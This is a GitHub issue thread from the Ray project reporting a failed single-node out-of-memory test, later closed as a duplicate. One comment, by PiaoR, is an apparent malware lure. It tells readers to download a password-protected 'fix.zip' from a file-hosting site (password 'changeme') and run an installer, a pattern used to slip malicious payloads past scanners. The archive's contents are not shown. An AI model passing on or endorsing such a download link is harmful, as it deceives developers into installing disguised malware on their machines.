### ISSUE TITLE
[Core] Single node OOM test failed

### ISSUE THREAD

**Issue by rkooo567** [ray-project/ray#47380]
### What happened + What you expected to happen

https://console.anyscale-staging.com/v2/cld_kvedZWag2qA8i5BjxUevf5i7/prj_qC3ZfndQWYYjx2cz8KWGNUL4/jobs/prodjob_93eylve1j2814glg82a7cntdnf?job-logs-section-tabs=application_logs&job-tab=overview

Failed with 
```
ray.exceptions.WorkerCrashedError: The worker died unexpectedly while executing this task. Check python-core-worker-*.log files for more information.
```

### Versions / Dependencies

master

### Reproduction script

N/a

### Issue Severity

None

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jjyao** [comment]
Duplicate
